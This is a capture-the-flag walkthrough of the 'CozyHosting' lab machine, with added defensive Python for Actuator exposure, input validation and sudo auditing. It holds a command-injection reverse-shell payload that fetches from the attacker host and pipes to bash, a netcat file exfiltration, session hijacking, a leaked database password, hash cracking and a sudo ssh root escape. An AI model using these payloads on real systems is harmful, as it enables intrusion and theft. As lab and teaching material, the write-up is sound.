CozyHosting
Recon
HTTP (80)
Standard landing page, with login

From the error page, the backend looks like Spring Boot (Java).

└─$ feroxbuster -u 'http://cozyhosting.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 285l 745w 12706c http://cozyhosting.htb/
401 GET 1l 1w 97c http://cozyhosting.htb/admin
500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 285l 745w 12706c http://cozyhosting.htb/index
204 GET 0l 0w 0c http://cozyhosting.htb/logout
[####################] - 23s 4763/4763 0s found:26 errors:0
[####################] - 22s 4728/4728 211/s http://cozyhosting.htb/
Spring Boot Actuator is a set of management/debugging endpoints built into Spring Boot; it shouldn't be exposed in production. https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators
http://cozyhosting.htb/actuator/env - confirms the endpoint exists. Nothing useful in it, but the fact that it's reachable means the other Actuator endpoints are probably exposed too.
└─$ curl http://cozyhosting.htb/actuator/mappings -s | jq '.contexts.application.mappings.dispatcherServlets.dispatcherServlet[].predicate'
"{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{ [/error], produces [text/html]}"
"{POST [/executessh]}"
"{ [/error]}"
"/admin"
"/addhost"
"/index"
"/login"
"/webjars/**"
"/**"
sessions is an unusual endpoint to see exposed.
└─$ curl http://cozyhosting.htb/actuator/sessions -s | jq
{
"8EE773FBF5B5DF2599C64F9D3A041B24": "kanderson",
"9EA5C959E316A20A75099C5FA20441E3": "UNAUTHORIZED"
}
Looks like we can log in with these session IDs. We already have a JSESSIONID cookie (the second one is ours); swap its value for kanderson's session ID and go to /admin.
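As an added defender's check (not part of the original writeup): parse the same /actuator/mappings JSON that the jq filter above reads and flag the Actuator endpoints that should not be reachable without authentication. The JSON sample is constructed from the predicates listed above, and the SENSITIVE set is my own triage list.

```python
import json
import re

# Minimal reconstruction of the /actuator/mappings JSON shape that the jq filter above
# walks (.contexts.application.mappings.dispatcherServlets.dispatcherServlet[].predicate),
# filled with the predicates seen on this box. Constructed sample, not a live capture.
SAMPLE_MAPPINGS = json.dumps({"contexts": {"application": {"mappings": {"dispatcherServlets": {
    "dispatcherServlet": [
        {"predicate": "{GET [/actuator/env/{toMatch}], produces [application/json]}"},
        {"predicate": "{GET [/actuator/env], produces [application/json]}"},
        {"predicate": "{GET [/actuator], produces [application/json]}"},
        {"predicate": "{GET [/actuator/beans], produces [application/json]}"},
        {"predicate": "{GET [/actuator/mappings], produces [application/json]}"},
        {"predicate": "{GET [/actuator/health/**], produces [application/json]}"},
        {"predicate": "{GET [/actuator/health], produces [application/json]}"},
        {"predicate": "{GET [/actuator/sessions], produces [application/json]}"},
        {"predicate": "{ [/error], produces [text/html]}"},
        {"predicate": "{POST [/executessh]}"},
        {"predicate": "/admin"},
        {"predicate": "/**"},
    ]}}}}})

# Actuator endpoints that hand out configuration, credentials or live session ids.
# This triage set is my own judgement; Spring Boot's default HTTP exposure is far narrower.
SENSITIVE = {"env", "sessions", "beans", "mappings", "heapdump", "configprops", "threaddump"}

def predicate_path(pred: str) -> str:
    """Pull the request path out of a Spring mapping predicate string."""
    m = re.search(r"\[([^\]]+)\]", pred)
    return m.group(1) if m else pred

def exposed_actuator_paths(mappings_json: str) -> list:
    """Every /actuator path registered with the dispatcher servlet, sorted."""
    doc = json.loads(mappings_json)
    servlet = doc["contexts"]["application"]["mappings"]["dispatcherServlets"]["dispatcherServlet"]
    paths = {predicate_path(e["predicate"]) for e in servlet}
    return sorted(p for p in paths if p.startswith("/actuator"))

def risky_actuator_endpoints(mappings_json: str) -> list:
    """Exposed endpoint ids a defender should disable or put behind authentication."""
    hits = set()
    for p in exposed_actuator_paths(mappings_json):
        parts = p.split("/")  # "/actuator/env/{toMatch}" -> ["", "actuator", "env", "{toMatch}"]
        if len(parts) > 2 and parts[2] in SENSITIVE:
            hits.add(parts[2])
    return sorted(hits)

if __name__ == "__main__":
    print("exposed:", exposed_actuator_paths(SAMPLE_MAPPINGS))
    print("risky:", risky_actuator_endpoints(SAMPLE_MAPPINGS))
```

On the Spring side the fix is to narrow `management.endpoints.web.exposure.include` (e.g. to `health`) in application.properties, or to require authentication for /actuator/**.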

Command injection works in the Username field; the username can't contain whitespace, and the hostname apparently has to be valid (?).

The command injection is a bit odd though: curl IP|bash didn't work, but sh worked, without giving a reverse shell...

LFI is possible (partially)

We can also leak the command with more semicolons.
host=x&username=;;{curl,-h};
Location: http://cozyhosting.htb/admin?error=/bin/bash: -c: line 1: syntax error near unexpected token `;;'/bin/bash: -c: line 1: `ssh -o ConnectTimeout=1 ;;{curl,-h};@x'
A reverse shell was possible with this kind of chain:
host=x&username=;curl${IFS}10.10.14.42/rev|bash;
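Added example, not code from the box or from the writeup: the allowlist validation and argv construction that would have closed the /executessh injection, plus a small indicator check that flags the two payloads quoted above in request logs. The field rules and regexes are my assumptions about the form.

```python
import re

# Strict allowlists for the two fields /executessh takes on this box; anything that
# fails them is rejected before it can reach a shell.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOST_LABEL_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Shell constructs used by the injection attempts above; for log triage, not as a
# replacement for the allowlist.
SHELL_PATTERNS = {
    "separator": re.compile(r"[;|&\n]"),
    "brace_expansion": re.compile(r"\{[^}]*,[^}]*\}"),
    "ifs_trick": re.compile(r"\$\{?IFS\}?"),
    "subshell": re.compile(r"\$\(|`"),
}

def is_valid_username(user: str) -> bool:
    return bool(USERNAME_RE.fullmatch(user))

def is_valid_host(host: str) -> bool:
    if IPV4_RE.fullmatch(host):
        return all(int(o) <= 255 for o in host.split("."))
    return 0 < len(host) <= 253 and all(HOST_LABEL_RE.fullmatch(l) for l in host.split("."))

def build_ssh_argv(user: str, host: str) -> list:
    """argv for subprocess.run(argv) with no shell in the path; the original app
    built a single bash -c string, which is what the error message above leaks."""
    if not is_valid_username(user) or not is_valid_host(host):
        raise ValueError("rejected ssh target")
    return ["ssh", "-o", "ConnectTimeout=1", f"{user}@{host}"]

def injection_indicators(value: str) -> list:
    """Names of the shell tricks present in a submitted field, for alerting."""
    return sorted(name for name, rx in SHELL_PATTERNS.items() if rx.search(value))

# Constructed samples: the two payloads quoted above plus a benign username.
SAMPLES = [";;{curl,-h};", ";curl${IFS}10.10.14.42/rev|bash;", "kanderson"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:40} valid={is_valid_username(s)} indicators={injection_indicators(s)}")
```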
Download the server jar file:
└─$ listen > cloudhosting-0.0.1.jar
---
$ busybox nc 10.10.14.42 4444 < /app/cloudhosting-0.0.1.jar
Use jd-gui to decompile the jar file. Inside are the datasource settings:

spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -c '\l'
                                  List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c '\dt'
         List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c 'SELECT * FROM users;'
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
Crack the password for admin
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:23 DONE (2024-11-24 20:39) 0.04219g/s 118.4p/s 118.4c/s 118.4C/s onlyme..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed
SSH (22)
Josh is the only user on the box, so he's probably the admin account. SSH login with the cracked password works.
Creds:
josh:manchesterunited
└─$ sshpass -p 'manchesterunited' ssh josh@cozyhosting.htb
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
User.txt
josh@cozyhosting:~$ cat user.txt
92f667a3c4b19fd327f7c82bbba9755b
Privilege Escalation
josh@cozyhosting:~$ sudo -l
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
https://gtfobins.github.io/gtfobins/ssh/
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
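Added example (not from the writeup): a quick audit of sudo -l output that flags rules like the one above, where a wildcard argument lets the caller pass arbitrary options to a binary that has a known shell escape. SHELL_ESCAPE_BINS is a hand-picked subset and is my assumption, not a complete list.

```python
import re

# sudo -l output quoted from this box (josh's entry), used as the sample input.
SUDO_L = r"""Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
"""

# "(runas) [NOPASSWD:] /path/to/cmd args..."
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*)?(\S+)(.*)$")

# Binaries whose own options can spawn a shell or write files once run as root;
# ssh's ProxyCommand, used above, is one such case. Hand-picked subset, not exhaustive.
SHELL_ESCAPE_BINS = {"ssh", "vim", "less", "find", "awk", "python3", "perl", "tar"}

def audit_sudo_l(text: str) -> list:
    """Flag sudo rules whose arguments are open-ended or whose binary can escape."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, nopasswd, cmd, args = m.group(1), bool(m.group(2)), m.group(3), m.group(4).strip()
        issues = []
        if "*" in args or args == "ALL":
            issues.append("wildcard args: caller controls options and arguments")
        if cmd.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
            issues.append("binary has a known shell escape via its own options")
        if nopasswd:
            issues.append("NOPASSWD")
        if issues:
            findings.append({"runas": runas, "cmd": cmd, "args": args, "issues": issues})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L):
        print(f"({f['runas']}) {f['cmd']} {f['args']}")
        for issue in f["issues"]:
            print("   -", issue)
```

The remediation for a rule like this is to pin the exact arguments (or wrap the call in a script that takes no caller-supplied options) rather than allowing `*`.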
Root.txt
# cd
# cat root.txt
b1dcd5867d771d9f5042edb0fd04a4d9